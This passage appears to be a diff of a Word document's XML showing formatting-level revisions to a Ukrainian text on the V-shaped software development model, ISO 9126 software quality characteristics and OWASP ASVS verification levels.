-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>на рис. 4.10</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, була розроблена як </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ізновид</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>фазами</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>проектування</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, які передують кодування, після якого йдуть фази тестування. Пунктирні лінії означаают, що ці фази необхідно розглядати паралельно.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3119,7 +3041,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D34EFBD" wp14:editId="6829F3FB">
             <wp:extent cx="4752975" cy="2724150"/>
@@ -3262,6 +3183,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Фази V-подібної моделі</w:t>
       </w:r>
     </w:p>
@@ -3407,7 +3329,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>розробка програмного коду - виконується перетворення алгоритмів, визначених на етапі деталізований проектування, в готове ПО;</w:t>
       </w:r>
     </w:p>
@@ -3544,6 +3465,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>виробництво, експлуатація та супровід - ПО запускається у виробництво. На цій фазі передбачені також модернізації та внесення поправок;</w:t>
       </w:r>
     </w:p>
@@ -3614,19 +3536,6 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3685,17 +3594,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> проектування. Фази інтеграції та тестування реалізують архітектурне проектування або проектування на вищому рівні. Фаза </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>тестування системи підтверджує правильність виконання етапу вимог до продукту і його специфікації;</w:t>
+        <w:t xml:space="preserve"> проектування. Фази інтеграції та тестування реалізують архітектурне проектування або проектування на вищому рівні. Фаза тестування системи підтверджує правильність виконання етапу вимог до продукту і його специфікації;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3847,6 +3746,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>модель проста у використанні (щодо проекту, для якого вона є прийнятною).</w:t>
       </w:r>
     </w:p>
@@ -3884,18 +3784,6 @@
         </w:rPr>
         <w:t>Недоліки V-подібної моделі</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4135,7 +4023,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>З</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -4281,7 +4168,16 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> для досягнення високої якості програмного забезпечення, які передбачають адаптацію наявних і створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
+        <w:t xml:space="preserve"> для досягнення високої якості програмного забезпечення, які передбачають адаптацію наявних і </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -4453,7 +4349,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ОГЛЯД</w:t>
       </w:r>
       <w:r>
@@ -4502,7 +4397,6 @@
         <w:ind w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -4511,12 +4405,75 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Якість програмого забезпечення це абстрактне поняття. Її присутність не завжди легко помітити, але відсутність помічається відразу. </w:t>
+        <w:t xml:space="preserve">Згідно до міжнародного стандарту </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>ISO 9126[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>як</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сть програмного дод</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>атку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> можна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> описати, як спроможність програмного продукту при заданих умовах відповідати встановленим та очікуваним вимогам зацікавлених сторін.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4537,29 +4494,25 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Згідно до міжнародного стандарту </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t>ISO 9126[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
+        <w:t xml:space="preserve">При розгляді якості програмного забезпечення з точки зору того ж стандарту </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ISO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>як</w:t>
+        <w:t xml:space="preserve"> 9126 [1-4] </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4568,31 +4521,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сть програмного дод</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>атку</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> можна</w:t>
+        <w:t>можна виділити поняття внутрішньої якості, яка пов</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4601,20 +4530,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> описати, як спроможність програмного продукту при заданих умовах відповідати встановленим та очікуваним вимогам зацікавлених сторін.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4622,52 +4548,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">При розгляді якості програмного забезпечення з точки зору того ж стандарту </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ISO</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 9126 [1-4] </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>можна виділити поняття внутрішньої якості, яка пов</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4868,17 +4750,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
+        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5021,6 +4893,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t xml:space="preserve">Нижче приведено визначення цих характеристик та атрибутів по стандарту </w:t>
       </w:r>
@@ -5225,7 +5098,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Відповідність стандартам і правилам (compliance). Відповідність ПО наявними індустріальним стандартам, нормативним і законодавчим актам, іншим регулюючим нормам.</w:t>
       </w:r>
     </w:p>
@@ -5450,6 +5322,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зручність використання (usability) або практичність. Здатність ПЗ бути зручним в навчанні і використанні, а також привабливим для користувачів.</w:t>
       </w:r>
     </w:p>
@@ -5560,7 +5433,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Відповідність стандартам зручності використання (usability compliance).</w:t>
       </w:r>
     </w:p>
@@ -5735,6 +5607,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -5904,7 +5777,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -6230,6 +6102,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -6398,7 +6271,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4502638" cy="3101630"/>
@@ -6591,7 +6463,27 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Додаток досягає ASVS 1-го рівня (або опортуністичних), якщо він адекватно захищає від вразливостей безпеки додатків, які легко виявити, і включені в OWASP Top 10 і інших подібних контрольних списків.</w:t>
+        <w:t>Додаток дос</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ягає ASVS 1-го рівня</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, якщо він адекватно захищає від вразливостей безпеки додатків, які легко виявити, і включені в OWASP Top 10 і інших подібних контрольних списків.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6623,7 +6515,19 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
+        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6716,7 +6620,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6729,6 +6632,16 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>досягає</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6739,7 +6652,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ASVS 2-</w:t>
+        <w:t>ASVS</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6749,6 +6662,16 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve"> 2-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>го</w:t>
       </w:r>
       <w:r>
@@ -6758,7 +6681,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6791,7 +6713,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
@@ -6812,7 +6733,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6833,7 +6753,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">), </w:t>
       </w:r>
@@ -6854,7 +6773,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6875,7 +6793,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6896,7 +6813,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6917,7 +6833,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6938,7 +6853,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6959,7 +6873,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6980,7 +6893,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
